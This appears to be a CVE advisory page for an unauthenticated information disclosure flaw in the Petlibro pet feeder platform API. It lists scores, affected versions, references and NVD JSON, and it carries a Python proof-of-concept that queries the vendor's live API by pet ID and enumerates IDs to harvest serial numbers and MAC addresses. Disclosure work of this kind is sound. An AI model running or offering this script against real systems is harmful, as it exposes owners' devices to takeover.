Security Vulnerability Report
CVE-2025-3654 CVSS 5.3 MEDIUM

CVE-2025-3654

Published: 2026-01-04 00:15:44
Last Modified: 2026-02-03 17:36:31

Description

Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to device hardware information by exploiting insecure API endpoints. Attackers can retrieve device serial numbers and MAC addresses through /device/devicePetRelation/getBoundDevices using pet IDs, enabling full device control without proper authorization checks.

CVSS Details

CVSS Score (CNA, secondary): 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS Score (NVD, primary): 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Score (CNA): 6.9 MEDIUM
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

Configurations (Affected Products)

cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:* - VULNERABLE
Petlibro Smart Pet Feeder Platform <= 1.7.31

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-3654 PoC - Petlibro Smart Pet Feeder Information Disclosure
# Target: Petlibro Smart Pet Feeder Platform <= 1.7.31


def exploit_cve_2025_3654(target_url, pet_id):
    """
    Exploit for CVE-2025-3654
    Information Disclosure via /api/device/devicePetRelation/getBoundDevices

    Args:
        target_url: Base URL of the Petlibro API server
        pet_id: Valid pet ID to query device information

    Returns:
        dict: Device information including serial numbers and MAC addresses
    """
    endpoint = f"{target_url}/api/device/devicePetRelation/getBoundDevices"
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Petlibro/1.7.31'
    }
    payload = {
        'petId': pet_id
    }

    try:
        # Send unauthenticated request to leak device information
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Successfully retrieved device information for pet_id: {pet_id}")
            print(f"[+] Response: {json.dumps(data, indent=2)}")
            return data
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {str(e)}")
        return None


def enumerate_pet_ids(target_url, start_id=1, end_id=1000):
    """
    Enumerate pet IDs to find valid IDs for exploitation
    """
    print(f"[*] Enumerating pet IDs from {start_id} to {end_id}")
    for pet_id in range(start_id, end_id + 1):
        result = exploit_cve_2025_3654(target_url, str(pet_id))
        if result and result.get('code') == 0:
            print(f"[+] Found valid pet_id: {pet_id}")
            return pet_id
    return None


# Example usage
if __name__ == "__main__":
    # Replace with actual target URL
    target = "https://api.petlibro.com"

    # Method 1: Direct exploitation with known pet_id
    print("=" * 50)
    print("CVE-2025-3654 PoC - Petlibro Information Disclosure")
    print("=" * 50)

    # Known pet ID
    pet_id = "123456"
    device_info = exploit_cve_2025_3654(target, pet_id)

    # Method 2: Enumerate pet IDs
    # valid_id = enumerate_pet_ids(target, 1, 10000)

References

https://bobdahacker.com/blog/petlibro (Product)
https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-information-disclosure-via-api-endpoint (Third Party Advisory)

Weakness: CWE-612
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-3654", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:44.273", "lastModified": "2026-02-03T17:36:31.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to device hardware information by exploiting insecure API endpoints. Attackers can retrieve device serial numbers and MAC addresses through /device/devicePetRelation/getBoundDevices using pet IDs, enabling full device control without proper authorization checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-612"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-information-disclosure-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}